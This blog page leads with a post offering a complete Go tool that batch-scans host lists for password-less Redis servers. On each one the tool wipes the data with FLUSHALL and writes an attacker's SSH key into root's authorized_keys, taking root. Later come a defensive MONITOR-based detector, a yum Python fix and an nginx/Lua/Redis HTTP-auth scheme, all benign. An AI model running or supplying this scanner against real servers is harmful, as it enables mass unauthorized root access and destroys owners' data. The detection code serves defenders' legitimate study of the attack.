Redis batch weak-password scan and get-root PoC [Go version]

netxfly, posted on 21 November 2015

A while ago the vulnerability of getting root on a server through a Redis weak password (or, as here, no password at all) was all over the place. I had not found time to look at it, and this afternoon I finally got around to writing a batch-exploitation PoC; the result is shown in the screenshot below. **Do not use this for anything illegal, just for fun.** Zhihu column link: [http://zhuanlan.zhihu.com/netxfly/20358468](http://zhuanlan.zhihu.com/netxfly/20358468)

![](/static/upload/2015112105144910.png)

How it works: Redis ships without authentication and `CONFIG SET` is available to every client, so an instance that is reachable from the network and runs as root lets an attacker set `dir` to `/root/.ssh/` and `dbfilename` to `authorized_keys`, store their public key as the only value, and then `SAVE`. The RDB dump becomes root's `authorized_keys`; sshd skips the binary lines around the key and accepts the key line itself. The PoC is destructive: it runs `FLUSHALL` on the target (after saving a copy of the data set as `xsec.rdb` in the current `dir`) and overwrites whatever was in root's `authorized_keys`. It only works when redis-server runs as root and the `CONFIG` command has not been renamed or disabled.

Install the dependency:

```
go get gopkg.in/redis.v3
```

The constant `rsa_key` is the content of your `cat ~/.ssh/id_rsa.pub`, generated as follows:

![](/static/upload/2015112105145910.png)

Full code:

```go
package main

import (
	"bufio"
	"bytes"
	"fmt"
	"log"
	"os"
	"runtime"
	"strings"
	"time"

	"gopkg.in/redis.v3"
)

// rsa_key is the content of `cat ~/.ssh/id_rsa.pub` (generate one with `ssh-keygen -t rsa`).
// The blank lines around it matter: the key ends up inside an RDB dump next to binary
// data, and sshd only needs one well-formed line of its own to accept the key.
const rsa_key = "\n\n<contents of ~/.ssh/id_rsa.pub; generate it with ssh-keygen -t rsa>\n\n"

// HostInfo holds one target and the result of testing it
type HostInfo struct {
	host   string
	port   string
	reply  string
	is_vul bool
}

// Usage prints the help text
func Usage(cmd string) {
	fmt.Println(strings.Repeat("-", 50))
	fmt.Println("Redis weak password poc by netxfly, x@xsec.io")
	fmt.Println("Usage:")
	fmt.Printf("%s iplist \n", cmd)
	fmt.Println(strings.Repeat("-", 50))
}

// main: one argument, a file with one host:port per line
func main() {
	runtime.GOMAXPROCS(runtime.NumCPU())
	Usage(os.Args[0])
	if len(os.Args) != 2 {
		return
	}
	Scan(Prepare(os.Args[1]))
}

// Prepare reads the target list, skipping blank lines and lines that are not host:port
func Prepare(iplist string) (slice_iplist []string) {
	iplistFile, err := os.Open(iplist)
	if err != nil {
		log.Fatalf("cannot open %s: %v", iplist, err)
	}
	defer iplistFile.Close()
	scanner := bufio.NewScanner(iplistFile)
	for scanner.Scan() {
		line := strings.TrimSpace(scanner.Text())
		if line == "" || !strings.Contains(line, ":") {
			continue
		}
		slice_iplist = append(slice_iplist, line)
	}
	return slice_iplist
}

// TestConnect sends an unauthenticated PING; if it succeeds, it redirects the next
// RDB dump to /root/.ssh/authorized_keys with the public key as the only value
func TestConnect(host_info HostInfo, chan_result chan HostInfo) {
	host := host_info.host
	port := host_info.port
	reply := host_info.reply
	is_vul := false
	var buf bytes.Buffer
	logger := log.New(&buf, "logger: ", log.Ldate)
	client := redis.NewClient(&redis.Options{
		Addr:     host + ":" + port,
		Password: "", // no password: that is exactly what is being tested
		DB:       0,  // use default DB
	})
	defer client.Close()
	_, err := client.Ping().Result()
	if err == nil {
		is_vul = true
		// keep a copy of the existing data set as xsec.rdb in the current dir before wiping it
		logger.Println(client.ConfigSet("dbfilename", "xsec.rdb").String())
		logger.Println(client.Save().String())
		logger.Println(client.FlushAll().String())
		// the public key is now the only value, so the dump stays small
		client.Set("xsec", rsa_key, 0)
		// point the dump at root's authorized_keys and write it
		logger.Println(client.ConfigSet("dir", "/root/.ssh/").String())
		logger.Println(client.ConfigGet("dir").String())
		reply = client.ConfigSet("dbfilename", "authorized_keys").String()
		logger.Println(reply)
		logger.Println(client.Save().String())
		fmt.Println(&buf)
	}
	host_info.is_vul = is_vul
	host_info.reply = reply
	chan_result <- host_info
}

// Scan tests all targets concurrently and prints the vulnerable ones
func Scan(slice_iplist []string) {
	n := len(slice_iplist)
	chan_scan_result := make(chan HostInfo, n)
	done := make(chan bool, n)
	for _, host_port := range slice_iplist {
		t := strings.SplitN(host_port, ":", 2)
		host_info := HostInfo{t[0], t[1], "", false}
		go TestConnect(host_info, chan_scan_result)
		// crude throttle: do not let more than 200 goroutines per CPU pile up
		for runtime.NumGoroutine() > runtime.NumCPU()*200 {
			time.Sleep(10 * time.Microsecond)
		}
	}
	go func() {
		for i := 0; i < cap(chan_scan_result); i++ {
			select {
			case r := <-chan_scan_result:
				if r.is_vul {
					fmt.Printf("%s:%s is vulnerable, get root's reply: %s\n", r.host, r.port, r.reply)
				}
			case <-time.After(60 * time.Second):
				fmt.Println("timeout")
			}
			done <- true
		}
	}()
	for i := 0; i < cap(done); i++ {
		<-done
	}
}
```
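The defender's view of the same trick, as an added example that is not part of the original post or its code: a Go routine that replays `redis-cli MONITOR` output and flags the `CONFIG SET dir` / `CONFIG SET dbfilename` / `SAVE` sequence the PoC above emits, attributing each step to the client connection that sent it. The MONITOR lines are constructed for this example, not captured from a real server; the `Alert` and `clientState` types and the alert wording are this example's own choices.

```go
package main

import (
	"fmt"
	"path"
	"regexp"
	"strings"
)

// sampleMonitor is a constructed excerpt of `redis-cli MONITOR` output (not a real capture).
// Each line is: <unix time> [<db> <client ip:port>] "<command>" "<arg>" ...
// The 10.0.0.9 client replays the sequence the PoC sends; 10.0.0.20 is normal traffic.
const sampleMonitor = `1448085600.101 [0 10.0.0.9:51234] "PING"
1448085600.102 [0 10.0.0.9:51234] "CONFIG" "SET" "dbfilename" "xsec.rdb"
1448085600.103 [0 10.0.0.9:51234] "SAVE"
1448085600.104 [0 10.0.0.9:51234] "FLUSHALL"
1448085600.105 [0 10.0.0.9:51234] "SET" "xsec" "\n\nssh-rsa AAAAB3NzaC1yc2E...constructed... x@xsec.io\n\n"
1448085600.106 [0 10.0.0.9:51234] "CONFIG" "SET" "dir" "/root/.ssh/"
1448085600.107 [0 10.0.0.9:51234] "CONFIG" "SET" "dbfilename" "authorized_keys"
1448085600.108 [0 10.0.0.9:51234] "SAVE"
1448085601.000 [0 10.0.0.20:40001] "GET" "session:abc"
1448085601.001 [0 10.0.0.20:40001] "CONFIG" "GET" "dir"`

// Alert is one suspicious action attributed to a client connection.
type Alert struct {
	Client string
	Reason string
	Path   string // the value that was set, or the file the dump would land in
}

// clientState remembers what a connection has changed so far.
type clientState struct {
	dir, dbfilename string
	changed         bool
}

var (
	lineRe = regexp.MustCompile(`^\S+ \[\d+ ([^\]]+)\] (.*)$`)
	argRe  = regexp.MustCompile(`"((?:[^"\\]|\\.)*)"`)
)

// parseMonitorLine splits one MONITOR line into the client address and the command arguments.
func parseMonitorLine(line string) (client string, args []string, ok bool) {
	m := lineRe.FindStringSubmatch(line)
	if m == nil {
		return "", nil, false
	}
	for _, a := range argRe.FindAllStringSubmatch(m[2], -1) {
		args = append(args, a[1])
	}
	return m[1], args, true
}

// Detect scans MONITOR output and flags the dump-redirection pattern:
// CONFIG SET dir, CONFIG SET dbfilename to a non-.rdb name, then SAVE/BGSAVE
// from the same client. CONFIG GET and ordinary commands never alert.
func Detect(monitorOutput string) []Alert {
	var alerts []Alert
	states := map[string]*clientState{}
	for _, line := range strings.Split(monitorOutput, "\n") {
		client, args, ok := parseMonitorLine(line)
		if !ok || len(args) == 0 {
			continue
		}
		st := states[client]
		if st == nil {
			st = &clientState{dir: "(unchanged)", dbfilename: "(unchanged)"}
			states[client] = st
		}
		cmd := strings.ToUpper(args[0])
		switch {
		case cmd == "CONFIG" && len(args) == 4 && strings.EqualFold(args[1], "SET"):
			key, val := strings.ToLower(args[2]), args[3]
			switch key {
			case "dir":
				st.dir, st.changed = val, true
				alerts = append(alerts, Alert{client, "CONFIG SET dir moves where the next dump is written", val})
			case "dbfilename":
				st.dbfilename, st.changed = val, true
				if !strings.HasSuffix(strings.ToLower(val), ".rdb") {
					alerts = append(alerts, Alert{client, "dbfilename set to a non-.rdb name", val})
				}
			}
		case (cmd == "SAVE" || cmd == "BGSAVE") && st.changed:
			alerts = append(alerts, Alert{client, "dump written after this client changed dir/dbfilename",
				path.Join(st.dir, st.dbfilename)})
		}
	}
	return alerts
}

func main() {
	for _, a := range Detect(sampleMonitor) {
		fmt.Printf("%-18s %-55s %s\n", a.Client, a.Reason, a.Path)
	}
}
```

On the sample this yields four alerts for `10.0.0.9:51234` and none for the other client; the last one names `/root/.ssh/authorized_keys` as the file the dump was written to. In production the same rules are cheaper to enforce up front with `rename-command CONFIG ""`, `requirepass`, a non-root service user and `bind` to a private address, but MONITOR (or the equivalent from a proxy) is what lets you see an attempt after the fact.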

Tags: Redis weak-password exploitation PoC


A simple implementation of a proxy-based web scanner

netxfly, posted on 5 July 2015

1. [A simple implementation of a proxy-based web scanner](http://docs.xsec.io/proxy_scanner/), [Zhihu column](http://zhuanlan.zhihu.com/netxfly/20099454)
2. [Implementation of a web scanner based on VPN and a transparent proxy](http://docs.xsec.io/Transparent-Proxy-Scanner/), [Zhihu column](http://zhuanlan.zhihu.com/netxfly/20114329)

Tags: proxy-based web scanner


Fixing "No module named yum"

netxfly, posted on 19 June 2015

After installing two Pythons newer than the system default on a machine, running yum again failed with the following error:

```shell
[root@localhost ~]# yum
There was a problem importing one of the Python modules
required to run yum. The error leading to this problem was:

   No module named yum

Please install a package which provides this module, or
verify that the module is installed correctly.

It's possible that the above module doesn't match the
current version of Python, which is:
2.6.8 (unknown, Jun 18 2015, 16:07:56)
[GCC 4.4.7 20120313 (Red Hat 4.4.7-4)]

If you cannot solve this problem yourself, please go to
the yum faq at:
  http://yum.baseurl.org/wiki/Faq
```

yum is written in Python, and the `yum` module is installed only for the system interpreter, so the error means yum is being started with one of the newly installed interpreters instead (the 2.6.8 above is neither the system's 2.6.6 nor the 2.7.10 that `python` now resolves to). The fix is to point yum at the interpreter that can import the `yum` module.

- Check which Pythons are on the machine

```
[root@localhost ~]# whereis python
python: /usr/bin/python2.6-config /usr/bin/python /usr/bin/python2.6 /usr/lib/python2.6 /usr/lib64/python2.6 /usr/local/bin/python2.6-config /usr/local/bin/python /usr/local/bin/python2.7-config /usr/local/bin/python2.7 /usr/local/bin/python2.6 /usr/local/lib/python2.7 /usr/local/lib/python2.6 /usr/include/python2.6 /usr/share/man/man1/python.1.gz
```

- Test the system 2.6 first

```
[root@localhost ~]# /usr/bin/python2.6
Python 2.6.6 (r266:84292, Nov 22 2013, 12:16:22)
[GCC 4.4.7 20120313 (Red Hat 4.4.7-4)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import yum
>>> exit()
```

Then the default 2.7.10:

```
[root@localhost ~]# python
Python 2.7.10 (default, Jun 18 2015, 15:51:08)
[GCC 4.4.7 20120313 (Red Hat 4.4.7-4)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import yum
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
ImportError: No module named yum
>>> exit()
```

- Change the Python that yum runs with: edit the shebang on the first line of `/usr/bin/yum`

```
[root@localhost ~]# vim /usr/bin/yum
#!/usr/bin/python2.6
```

Only the shebang of `/usr/bin/yum` is changed here; `/usr/bin/python` itself is left alone, since other system tools depend on it in the same way yum does.

Tags: linux


Implementing nginx HTTP auth with Lua + Redis

netxfly, posted on 10 May 2015

# nginx HTTP auth backed by Redis

This article is the third scheme from yesterday's post ([several options for nginx login authentication](http://www.xsec.io/article/60/nginx-auth.html)): HTTP auth implemented with nginx + lua + redis.

# Implementation of the Radius API

The MongoDB of scheme 2 is replaced with Redis, and password expiry is handed over to Redis: the user's hash is written with `hmset` and given a TTL with `expire`, so the temporary secret stops working on its own without a cleanup job.

```python
import datetime
import json

import redis
import tornado.web

# CONST_REDIS, CONST_RADIUS, CONST_TIMEOUT (in minutes), RadiusAuth and GenSecuret
# come from the rest of the project (see the earlier article); they are not repeated here.


# Auth class
# ----------------------------------------------------------------------------
class Auth2(tornado.web.RequestHandler):
    def initialize(self):
        self.radius_auth = None
        self.redis_client = None

    def get(self):
        self.render("auth2.html")

    def post(self):
        self.redis_client = redis.StrictRedis(
            host=CONST_REDIS.get('host'),
            port=CONST_REDIS.get('port'),
            db=CONST_REDIS.get('db'),
            password=CONST_REDIS.get('password')
        )
        self.radius_auth = RadiusAuth(CONST_RADIUS)
        username = self.get_argument("username", "") or ""
        password = self.get_argument("password", "") or ""
        now = datetime.datetime.now()
        # the real credential check is done against Radius
        ret_auth = self.radius_auth.auth(username.encode('utf-8'), password.encode('utf-8'))
        expire = CONST_TIMEOUT * 60  # seconds
        if ret_auth:
            gen_secret = GenSecuret(username, password)
            secret = gen_secret.get_secret()
            values = dict(
                username=username,
                password=secret,
                time=now
            )
            # insert into redis and set the key to expire; nginx looks this hash up
            self.redis_client.hmset(username, values)
            self.redis_client.expire(username, expire)
            # return the temporary secret to the client
            ret = dict(
                username=username,
                password=secret,
                status=True,
                expire=expire
            )
            self.write(json.dumps(ret))
        else:
            ret = dict(
                username=username,
                password="",
                status=False,
                expire=expire
            )
            self.write(json.dumps(ret))
```

# nginx HTTP auth using Redis

```lua
local p = "/usr/local/openresty/lualib"
local m_package_path = package.path
package.path = string.format("%s?.lua;%s?/init.lua;%s", p, p, m_package_path)

-- http basic auth: nginx has already parsed the Authorization header
function auth()
    local username = ngx.var.remote_user
    local password = ngx.var.remote_passwd
    -- if auth_monogodb(username, password) then   -- the scheme 2 variant
    --     return
    -- end
    if auth_redis(username, password) then
        return
    end
    ngx.header.www_authenticate = [[Basic realm="sinasec auth"]]
    ngx.exit(401)
end

-- auth by redis: the user's hash is written by the Auth2 handler above
-- and disappears on its own once its EXPIRE fires
function auth_redis(username, password)
    -- no Authorization header at all: nothing to look up
    if not username or not password then
        return false
    end
    local redis_info = {
        host = "127.0.0.1",
        port = 6379,
        db = 0,
        password = "mypass"
    }
    local redis = require "resty.redis"
    local red = redis:new()
    red:set_timeout(3000) -- 3 sec
    local ok, err = red:connect(redis_info["host"], redis_info["port"])
    if not ok then
        ngx.log(ngx.ERR, "failed to connect: ", err)
        return false
    end
    local res, err = red:auth(redis_info["password"])
    if not res then
        ngx.log(ngx.ERR, "failed to authenticate: ", err)
        return false
    end
    local res, err = red:hmget(username, "username", "password")
    if not res or res == ngx.null then
        ngx.log(ngx.ERR, "hmget failed: ", err)
        return false
    end
    -- put the connection back into the pool instead of closing it
    red:set_keepalive(10000, 100)
    -- hmget returns ngx.null for fields (or keys) that do not exist
    local user = res[1]
    local pass = res[2]
    if user == ngx.null or pass == ngx.null then
        return false
    end
    return user ~= "" and pass ~= "" and username == user and password == pass
end

-- call auth function
auth()
```

Two things to keep in mind with this design: every active secret sits in Redis in clear text (the `password` field of the hash), so the Redis instance at 127.0.0.1:6379, whose password is in the Lua file, is as sensitive as the credentials themselves; and the TTL set by `expire` is the only thing that ends a session, since the Lua side never rewrites or removes the key.
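The two halves of this scheme, issuing an expiring secret after the upstream check and verifying it on every request, as an added example that is not part of the original post. It is written in Go (the language of this blog's other tools) rather than the post's Python and Lua, and an in-memory map stands in for the Redis hash and its EXPIRE so that it runs offline; `CredStore`, `Issue`, `Verify`, `BasicAuth` and `Request` are this example's own names, and the 30-minute TTL is an assumed value. Unlike the Lua `==`, the comparison is constant-time, and the injectable clock lets the expiry case be exercised.

```go
package main

import (
	"crypto/rand"
	"crypto/subtle"
	"encoding/hex"
	"fmt"
	"net/http"
	"net/http/httptest"
	"time"
)

// cred is what the Auth2 handler writes into the per-user Redis hash: the
// temporary secret plus the moment it stops being valid (Redis does this with EXPIRE).
type cred struct {
	secret  string
	expires time.Time
}

// CredStore is an in-memory stand-in for that Redis hash (assumption: no real Redis
// in this example). now is injectable so that expiry can be tested deterministically.
type CredStore struct {
	entries map[string]cred
	now     func() time.Time
}

func NewCredStore(now func() time.Time) *CredStore {
	return &CredStore{entries: map[string]cred{}, now: now}
}

// Issue runs after the upstream (Radius) check has passed: mint a random secret,
// store it with a TTL and return it to the client, as Auth2.post does.
func (s *CredStore) Issue(username string, ttl time.Duration) string {
	b := make([]byte, 16)
	if _, err := rand.Read(b); err != nil {
		panic(err)
	}
	secret := hex.EncodeToString(b)
	s.entries[username] = cred{secret: secret, expires: s.now().Add(ttl)}
	return secret
}

// Verify is the per-request check the Lua auth_redis does: unknown or expired
// user fails; otherwise compare the presented password with the secret in constant time.
func (s *CredStore) Verify(username, password string) bool {
	c, ok := s.entries[username]
	if !ok {
		return false
	}
	if !s.now().Before(c.expires) {
		delete(s.entries, username) // what Redis does by itself when the TTL fires
		return false
	}
	return subtle.ConstantTimeCompare([]byte(c.secret), []byte(password)) == 1
}

// BasicAuth guards a handler the way the Lua auth() guards a location:
// missing or bad credentials get a 401 with the realm, anything else passes through.
func BasicAuth(store *CredStore, next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		user, pass, ok := r.BasicAuth()
		if !ok || !store.Verify(user, pass) {
			w.Header().Set("WWW-Authenticate", `Basic realm="sinasec auth"`)
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// Request drives one GET through the handler in memory and returns the status code.
func Request(h http.Handler, user, pass string) int {
	req := httptest.NewRequest("GET", "/protected", nil)
	if user != "" {
		req.SetBasicAuth(user, pass)
	}
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	clock := time.Now()
	store := NewCredStore(func() time.Time { return clock })
	h := BasicAuth(store, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		fmt.Fprintln(w, "hello "+r.URL.Path)
	}))
	secret := store.Issue("alice", 30*time.Minute) // assumed TTL
	fmt.Println("right secret:", Request(h, "alice", secret))
	fmt.Println("wrong secret:", Request(h, "alice", "nope"))
	fmt.Println("no header:   ", Request(h, "", ""))
	clock = clock.Add(31 * time.Minute) // advance past the TTL
	fmt.Println("after expiry:", Request(h, "alice", secret))
}
```

The same shape carries over to the real stack: the Tornado handler is `Issue`, the Lua block is `Verify` plus the 401 path, and Redis replaces the map. What the example adds is the two checks the page's Lua leaves out, a guard for a missing header and a constant-time compare.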

Tags: nginx redis lua
